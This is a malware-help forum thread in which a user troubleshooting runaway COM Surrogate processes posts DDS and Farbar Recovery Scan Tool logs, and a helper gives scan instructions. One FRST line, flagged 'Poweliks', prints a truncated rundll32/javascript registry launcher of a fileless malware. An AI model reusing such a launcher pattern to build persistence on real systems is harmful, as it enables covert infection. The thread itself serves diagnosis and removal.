Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple dllhost.exe/Com Surrogate processes running


  • This topic is locked This topic is locked
10 replies to this topic

#1 mcgrotty

mcgrotty

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:18 PM

Posted 19 July 2014 - 09:16 PM

Hello,

 

I'm having the same problem as talked about in

http://www.bleepingcomputer.com/forums/t/525236/30-dllhostexe32-com-surrogate-processes-running-cant-kill/ (which itself was based on another thread) and sure could use some help.

 

As described, I am constantly having 2 to 3 dozen instances of Com Surrogate opening up for no reason whatsoever, ending up using enough resources as to make any other application not be responsive, due to lack of resources. All I can do is keep Task Manager open and close them, one at a time, every time it happens (every 4 or 5 minutes). Luckily, I was able to once get a DDS scan (6 times it locked up before finishing). The only problem is I couldn't get it to ever complete when the Com Surrogates were running, so they aren't in the logs.

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 9.0.8112.16561
Run by MikeandBert at 15:16:19 on 2014-07-19
Microsoft® Windows Vista™ Home Premium   6.0.6002.2.1252.1.1033.18.1790.813 [GMT -7:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Anti-Virus Free Edition 2012 *Enabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
SP: AVG Anti-Virus Free Edition 2012 *Enabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
SP: Microsoft Security Essentials *Enabled/Updated* {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ================
.
C:\PROGRA~1\AVG\AVG2012\avgrsx.exe
C:\Program Files\AVG\AVG2012\avgcsrvx.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\nvvsvc.exe
C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
C:\Windows\system32\SLsvc.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\agrsmsvc.exe
C:\Program Files\AVG\AVG2012\avgwdsvc.exe
C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\System32\WUDFHost.exe
C:\Program Files\AVG\AVG2012\AVGIDSAgent.exe
C:\Program Files\AVG\AVG2012\avgnsx.exe
C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\AVG\AVG2012\avgtray.exe
C:\Windows\V0415Mon.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files\FinePixViewerS\QuickDCF2.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\explorer.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\Taskmgr.exe
C:\Windows\System32\mobsync.exe
C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
C:\Windows\system32\wuauclt.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\vssvc.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\SoftwareDistribution\Download\Install\MSEInstall.exe
d:\ad7ad658e1ede53e8e60d9a3790b\epplauncher.exe
d:\ad7ad658e1ede53e8e60d9a3790b\x86\Setup.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k swprv
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.google.com/
uSearch Bar = Preserve
uSearch Page = hxxp://www.google.com
mStart Page = hxxp://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
uSearchURL,(Default) = hxxp://www.google.com/search/?q=%s
uURLSearchHooks: {32b29df0-2237-4370-9a29-37cebb730e9b} - <orphaned>
uURLSearchHooks: {b2bf7b3f-bf0b-4c48-aec6-f92c51be63e1} - <orphaned>
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
BHO: AVG Do Not Track: {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} - c:\program files\avg\avg2012\avgdtiex.dll
BHO: DivX Plus Web Player HTML5 <video>: {326E768D-4182-46FD-9C16-1449A49795F4} - c:\program files\divx\divx plus web player\npdivx32.dll
BHO: AVG Safe Search: {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - c:\program files\avg\avg2012\avgssie.dll
BHO: DivX HiQ: {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - c:\program files\divx\divx plus web player\npdivx32.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre6\bin\jp2ssv.dll
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [ROC_ROC_APR2013_AV] c:\users\mikeandbert\appdata\roaming\avg april 2013 campaign\AVG-Secure-Search-Update.exe /PROMPT --mid 4c3a92315fe1dd717e851537e9f968fa-1652e8e61a40f8e82af9031c84a1aefb502cf7b7 --CMPID ROC_APR2013_AV --CMPIDEXTRA 2012
uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe
uRun: [AVG-Secure-Search-Update_0913a] c:\users\mikeandbert\appdata\roaming\avg 0913a campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 4c3a92315fe1dd717e851537e9f968fa-1652e8e61a40f8e82af9031c84a1aefb502cf7b7 --CMPID 0913a
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [eRecoveryService] <no file>
mRunOnce: [AvgUninstallURL] cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-app?lic="&"inst=NwA3AC0ANAAxADMANAA1ADgANwAwADIALQBGAFAAOQArADYALQBCAEEAUgA5AEcAKwAxAC0AVABCADkAKwAyAC0ARgBMACsAOQAtAFgATwAzADYAKwAxAC0ARgA5AE0ANwBDACsANQAtAEYAOQBNADEAMABCACsAMQA"&"prod=0"&"ver=9.0.894
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\exifla~1.lnk - c:\program files\finepixviewers\QuickDCF2.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:0
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Sothink SWF Catcher - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office12\ONBttnIE.dll
IE: {68BCFFE1-A2DA-4B40-9068-87ECBFC19D16} - {68BCFFE1-A2DA-4B40-9068-87ECBFC19D16} - c:\program files\avg\avg2012\avgdtiex.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
LSP: %SYSTEMROOT%\system32\nvLsp.dll
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - hxxp://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} - file:///F:/win/setup/iamce.dll
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} - hxxp://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{EF6BA016-F284-490A-B0CE-D80828CE6304} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\program files\microsoft office\office12\GrooveSystemServices.dll
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg2012\avgpp.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\mikeandbert\appdata\roaming\mozilla\firefox\profiles\icjdnhbo.default\
FF - prefs.js: keyword.URL - hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\checkpoint\zaforcefield\trustchecker\bin\npFFApi.dll
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
FF - plugin: c:\program files\google\update\1.3.21.115\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: c:\program files\microsoft silverlight\4.0.60831.0\npctrlui.dll
FF - plugin: c:\users\mikeandbert\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_3_300_257.dll
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHX;AVGIDSHX;c:\windows\system32\drivers\avgidshx.sys [2012-4-19 24896]
R0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\drivers\avgrkx86.sys [2012-1-31 31952]
R0 gfibto;gfibto;c:\windows\system32\drivers\gfibto.sys [2012-12-2 13560]
R1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\drivers\avgldx86.sys [2012-11-8 250080]
R1 Avgmfx86;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\drivers\avgmfx86.sys [2011-12-23 41040]
R1 Avgtdix;AVG TDI Driver;c:\windows\system32\drivers\avgtdix.sys [2013-4-11 302368]
R1 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2011-4-18 165648]
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\avg\avg2012\avgidsagent.exe [2013-10-16 5175856]
R2 avgwd;AVG WatchDog;c:\program files\avg\avg2012\avgwdsvc.exe [2012-2-14 193288]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 21504]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files\nvidia corporation\3d vision\nvSCPAPISvr.exe [2013-1-18 383264]
R3 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\drivers\avgidsdriverx.sys [2012-12-10 142176]
R3 AVGIDSFilter;AVGIDSFilter;c:\windows\system32\drivers\avgidsfilterx.sys [2011-12-23 24144]
R3 AVGIDSShim;AVGIDSShim;c:\windows\system32\drivers\avgidsshimx.sys [2011-12-23 17232]
R3 MpNWMon;Microsoft Malware Protection Network Driver;c:\windows\system32\drivers\MpNWMon.sys [2011-4-18 43392]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2011-4-27 65024]
R3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\antimalware\NisSrv.exe [2011-4-27 208944]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-10-23 172192]
S3 V0415Vid;Creative Live! Cam Video IM Ultra Driver;c:\windows\system32\drivers\V0415Vid.sys [2009-8-3 286208]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2013-9-11 770168]
.
=============== File Associations ===============
.
FileExt: .js: Applications\notepad.exe=c:\windows\system32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-07-19 21:55:47 -------- d-----w- C:\FRST
2014-07-18 23:51:28 8217224 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{0b65a92b-ee0c-42f7-aa78-a2113504c383}\mpengine.dll
2014-06-25 17:59:41 -------- d-----w- c:\users\mikeandbert\appdata\local\Adobe
.
==================== Find3M  ====================
.
2014-07-08 18:28:13 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-08 18:28:13 699056 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-06-07 00:19:04 2051072 ----a-w- c:\windows\system32\win32k.sys
2014-06-06 23:12:01 1810432 ----a-w- c:\windows\system32\jscript9.dll
2014-06-06 23:03:02 1427968 ----a-w- c:\windows\system32\inetcpl.cpl
2014-06-06 23:02:16 1129472 ----a-w- c:\windows\system32\wininet.dll
2014-06-06 22:57:04 142848 ----a-w- c:\windows\system32\ieUnatt.exe
2014-06-06 22:56:20 421376 ----a-w- c:\windows\system32\vbscript.dll
2014-06-06 22:52:42 2382848 ----a-w- c:\windows\system32\mshtml.tlb
2014-06-06 22:51:59 11776 ----a-w- c:\windows\system32\mshta.exe
2014-06-06 08:59:38 506880 ----a-w- c:\windows\system32\qedit.dll
2014-05-30 06:53:22 273408 ----a-w- c:\windows\system32\drivers\afd.sys
2014-04-26 16:01:22 502784 ----a-w- c:\windows\system32\usp10.dll
2012-03-19 06:40:26 174008 ----a-w- c:\program files\2pres.dll
.
============= FINISH: 15:17:16.76 ===============
 

Attached Files



BC AdBot (Login to Remove)

 


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:18 AM

Posted 20 July 2014 - 03:34 AM

Hi there,

please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 mcgrotty

mcgrotty
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:18 PM

Posted 20 July 2014 - 02:24 PM

Thank you.

 

FRST file:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:20-07-2014
Ran by MikeandBert (administrator) on HOME-PC on 20-07-2014 12:20:30
Running from C:\Users\MikeandBert\Desktop\com fix
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgcsrvx.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Agere Systems) C:\Windows\System32\agrsmsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgwdsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgnsx.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Creative Technology Ltd.) C:\Windows\V0415Mon.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(FUJIFILM Corporation) C:\Program Files\FinePixViewerS\QuickDCF2.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmplayer.exe

==================== Registry (Whitelisted) ==================

HKLM\...\RunOnce: [AvgUninstallURL] => cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-app?lic="&"inst=NwA3AC0ANAAxA (the data entry has 174 more characters).
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [ROC_ROC_APR2013_AV] => C:\Users\MikeandBert\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT -- (the data entry has 119 more characters).
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\MikeandBert\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT - (the data entry has 93 more characters).
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplica (the data entry has 289 more characters). <==== Poweliks!
HKU\S-1-5-21-165418536-3136176592-1450045568-1003\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Exif Launcher S.lnk
ShortcutTarget: Exif Launcher S.lnk -> C:\Program Files\FinePixViewerS\QuickDCF2.exe (FUJIFILM Corporation)
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2012\avgrsx.exe /sync /restart

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
URLSearchHook: HKCU - (No Name) - {32b29df0-2237-4370-9a29-37cebb730e9b} -  No File
URLSearchHook: HKCU - (No Name) - {b2bf7b3f-bf0b-4c48-aec6-f92c51be63e1} -  No File
SearchScopes: HKLM - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKLM - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKLM - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
SearchScopes: HKCU - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: AVG Do Not Track -> {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} -> C:\Program Files\AVG\AVG2012\avgdtiex.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX HiQ -> {593DDEC6-7468-4cdd-90E1-42DADAA222E9} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKCU - No Name - {32B29DF0-2237-4370-9A29-37CEBB730E9B} -  No File
Toolbar: HKCU - No Name - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} -  No File
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} file:///F:/win/setup/iamce.dll
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} http://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll (AVG Technologies CZ, s.r.o.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog9 01 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 02 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 03 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 14 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default
FF Keyword.URL: hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @checkpoint.com/FFApi - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
